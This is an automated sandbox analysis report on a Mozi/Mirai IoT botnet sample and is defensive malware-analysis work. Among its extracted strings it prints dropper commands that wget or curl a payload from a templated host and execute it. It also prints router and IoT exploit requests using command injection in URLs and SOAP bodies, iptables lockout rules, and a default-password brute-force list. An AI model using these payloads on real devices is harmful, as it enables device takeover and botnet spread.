Loading ...

Play interactive tourEdit tour

Linux Analysis Report Mozi.a

Overview

General Information

Sample Name:Mozi.a
Analysis ID:510721
MD5:e30a81d66f18f07647397d1defbad11b
SHA1:a7fd1a1d71f7f7b00886741db52c42af0c8873f1
SHA256:b7ba5aa2f8f7781d408e87b2131fa2cc9b95cdf3460f9778229398c9e851772a
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Found strings indicative of a multi-platform dropper
Sample contains only a LOAD segment without any section mappings
Yara signature match
Sample contains strings that are potentially command strings
Sample contains strings indicative of password brute-forcing capabilities
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:510721
Start date:28.10.2021
Start time:06:46:30
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 53s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Mozi.a
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal92.spre.troj.linA@0/0@0/0
Warnings:
Show All
  • VT rate limit hit for: http://%s:%d/Mozi.m;

Process Tree

  • system is lnxubuntu20
  • Mozi.a (PID: 5244, Parent: 5118, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/Mozi.a
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Mozi.aSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x1fce8:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x1fd57:$s2: $Id: UPX
  • 0x1fd08:$s3: $Info: This file is packed with the UPX executable packer
Mozi.aSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.aJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    Mozi.aJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      Mozi.aJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        5244.1.00000000462a18a2.00000000e4311033.r-x.sdmpSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
        • 0x1fce8:$s1: PROT_EXEC|PROT_WRITE failed.
        • 0x1fd57:$s2: $Id: UPX
        • 0x1fd08:$s3: $Info: This file is packed with the UPX executable packer

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: Mozi.aAvira: detected
        Multi AV Scanner detection for submitted fileShow sources
        Source: Mozi.aVirustotal: Detection: 63%Perma Link
        Source: Mozi.aMetadefender: Detection: 50%Perma Link
        Source: Mozi.aReversingLabs: Detection: 78%

        Spreading:

        barindex
        Found strings indicative of a multi-platform dropperShow sources
        Source: Mozi.aString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
        Source: Mozi.aString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
        Source: Mozi.aString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: Mozi.aString found in binary or memory: http://%s:%d/Mozi.a;chmod
        Source: Mozi.aString found in binary or memory: http://%s:%d/Mozi.a;sh$
        Source: Mozi.aString found in binary or memory: http://%s:%d/Mozi.m
        Source: Mozi.aString found in binary or memory: http://%s:%d/Mozi.m;
        Source: Mozi.aString found in binary or memory: http://%s:%d/Mozi.m;$
        Source: Mozi.aString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
        Source: Mozi.aString found in binary or memory: http://%s:%d/bin.sh
        Source: Mozi.aString found in binary or memory: http://%s:%d/bin.sh;chmod
        Source: Mozi.aString found in binary or memory: http://127.0.0.1
        Source: Mozi.aString found in binary or memory: http://127.0.0.1sendcmd
        Source: Mozi.aString found in binary or memory: http://HTTP/1.1
        Source: Mozi.aString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
        Source: Mozi.aString found in binary or memory: http://ipinfo.io/ip
        Source: Mozi.aString found in binary or memory: http://purenetworks.com/HNAP1/
        Source: Mozi.aString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: Mozi.aString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: Mozi.aString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
        Source: Mozi.a, 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmpString found in binary or memory: http://upx.sf.net
        Source: LOAD without section mappingsProgram segment: 0x400000
        Source: Mozi.a, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
        Source: Mozi.a, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
        Source: 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp, type: MEMORYMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
        Source: Initial samplePotential command found: POST /cdn-cgi/
        Source: Initial samplePotential command found: GET /c HTTP/1.0
        Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
        Source: Initial samplePotential command found: GET %s HTTP/1.1
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
        Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
        Source: Initial samplePotential command found: mount -o remount,rw /overlay /
        Source: Initial samplePotential command found: mv -f %s %s
        Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
        Source: Initial samplePotential command found: GET /c
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
        Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
        Source: Initial samplePotential command found: killall -9 %s
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
        Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
        Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
        Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
        Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
        Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
        Source: Initial samplePotential command found: GET /%s HTTP/1.1
        Source: Initial samplePotential command found: POST /%s HTTP/1.1
        Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
        Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
        Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
        Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
        Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
        Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
        Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
        Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
        Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
        Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
        Source: Initial sampleString containing potential weak password found: admin
        Source: Initial sampleString containing potential weak password found: default
        Source: Initial sampleString containing potential weak password found: support
        Source: Initial sampleString containing potential weak password found: service
        Source: Initial sampleString containing potential weak password found: supervisor
        Source: Initial sampleString containing potential weak password found: guest
        Source: Initial sampleString containing potential weak password found: administrator
        Source: Initial sampleString containing potential weak password found: 123456
        Source: Initial sampleString containing potential weak password found: 54321
        Source: Initial sampleString containing potential weak password found: password
        Source: Initial sampleString containing potential weak password found: 12345
        Source: Initial sampleString containing potential weak password found: admin1234
        Source: Initial sampleString containing 'busybox' found: busybox
        Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
        Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
        Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
        Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
        Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
        Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
        Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
        Source: classification engineClassification label: mal92.spre.troj.linA@0/0@0/0
        Source: Mozi.aJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
        Source: /tmp/Mozi.a (PID: 5244)Queries kernel information via 'uname': Jump to behavior
        Source: Mozi.a, 5244.1.000000004f8eb38e.0000000028a15c7e.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
        Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
        Source: Mozi.a, 5244.1.000000004f8eb38e.0000000028a15c7e.rw-.sdmpBinary or memory string: UV!/etc/qemu-binfmt/mips
        Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/Mozi.aSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.a
        Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmpBinary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

        Stealing of Sensitive Information:

        barindex
        Yara detected MiraiShow sources
        Source: Yara matchFile source: Mozi.a, type: SAMPLE

        Remote Access Functionality:

        barindex
        Yara detected MiraiShow sources
        Source: Yara matchFile source: Mozi.a, type: SAMPLE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsCommand and Scripting Interpreter1Path InterceptionPath InterceptionScripting1Brute Force1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScripting1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

        Malware Configuration

        No configs have been found

        Behavior Graph

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Mozi.a64%VirustotalBrowse
        Mozi.a50%MetadefenderBrowse
        Mozi.a79%ReversingLabsLinux.Trojan.Mirai
        Mozi.a100%AviraLINUX/Mirai.oreox

        Dropped Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
        http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
        http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
        http://%s:%d/bin.sh0%Avira URL Cloudsafe
        http://purenetworks.com/HNAP1/0%URL Reputationsafe
        http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
        http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
        http://HTTP/1.10%Avira URL Cloudsafe
        http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
        http://127.0.0.10%Avira URL Cloudsafe
        http://%s:%d/Mozi.m0%Avira URL Cloudsafe
        http://127.0.0.1sendcmd0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://%s:%d/bin.sh;chmodMozi.atrue
        • Avira URL Cloud: safe
        low
        http://ipinfo.io/ipMozi.afalse
          high
          http://%s:%d/Mozi.a;chmodMozi.atrue
          • Avira URL Cloud: safe
          low
          http://%s:%d/Mozi.m;/tmp/Mozi.mMozi.afalse
          • Avira URL Cloud: safe
          low
          http://schemas.xmlsoap.org/soap/encoding/Mozi.afalse
            high
            http://%s:%d/bin.shMozi.atrue
            • Avira URL Cloud: safe
            low
            http://purenetworks.com/HNAP1/Mozi.afalse
            • URL Reputation: safe
            unknown
            http://%s:%d/Mozi.m;Mozi.afalse
            • Avira URL Cloud: safe
            low
            http://%s:%d/Mozi.m;$Mozi.afalse
            • Avira URL Cloud: safe
            low
            http://schemas.xmlsoap.org/soap/envelope/Mozi.afalse
              high
              http://upx.sf.netMozi.a, 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmpfalse
                high
                http://HTTP/1.1Mozi.afalse
                • Avira URL Cloud: safe
                low
                http://%s:%d/Mozi.a;sh$Mozi.atrue
                • Avira URL Cloud: safe
                low
                http://127.0.0.1Mozi.afalse
                • Avira URL Cloud: safe
                unknown
                http://baidu.com/%s/%s/%d/%s/%s/%s/%s)Mozi.afalse
                  high
                  http://schemas.xmlsoap.org/soap/envelope//Mozi.afalse
                    high
                    http://%s:%d/Mozi.mMozi.afalse
                    • Avira URL Cloud: safe
                    low
                    http://127.0.0.1sendcmdMozi.afalse
                    • Avira URL Cloud: safe
                    low

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    109.202.202.202
                    unknownSwitzerland
                    13030INIT7CHfalse
                    91.189.91.43
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    91.189.91.42
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse


                    Runtime Messages

                    Command:/tmp/Mozi.a
                    Exit Code:133
                    Exit Code Info:
                    Killed:False
                    Standard Output:

                    Standard Error:qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    109.202.202.202ggbMKQDdG2Get hashmaliciousBrowse
                      SecuriteInfo.com.Linux.Siggen.4218.31606.9155Get hashmaliciousBrowse
                        AbriuSDkeLGet hashmaliciousBrowse
                          xjmPNreY8IGet hashmaliciousBrowse
                            u7kjf23xQcGet hashmaliciousBrowse
                              nrT4coM180Get hashmaliciousBrowse
                                Fy8SpcfH79Get hashmaliciousBrowse
                                  6vqWv6BFhRGet hashmaliciousBrowse
                                    WaH4Q4OTzDGet hashmaliciousBrowse
                                      6s4RqypN8pGet hashmaliciousBrowse
                                        0vknf5ybYdGet hashmaliciousBrowse
                                          sddX6YllruGet hashmaliciousBrowse
                                            8NC2CO6W0BGet hashmaliciousBrowse
                                              nEzZe0JYXLGet hashmaliciousBrowse
                                                D3xbHFJTICGet hashmaliciousBrowse
                                                  ivgMZPUOLxGet hashmaliciousBrowse
                                                    5VWtwrKOJbGet hashmaliciousBrowse
                                                      Bs5fIqZapqGet hashmaliciousBrowse
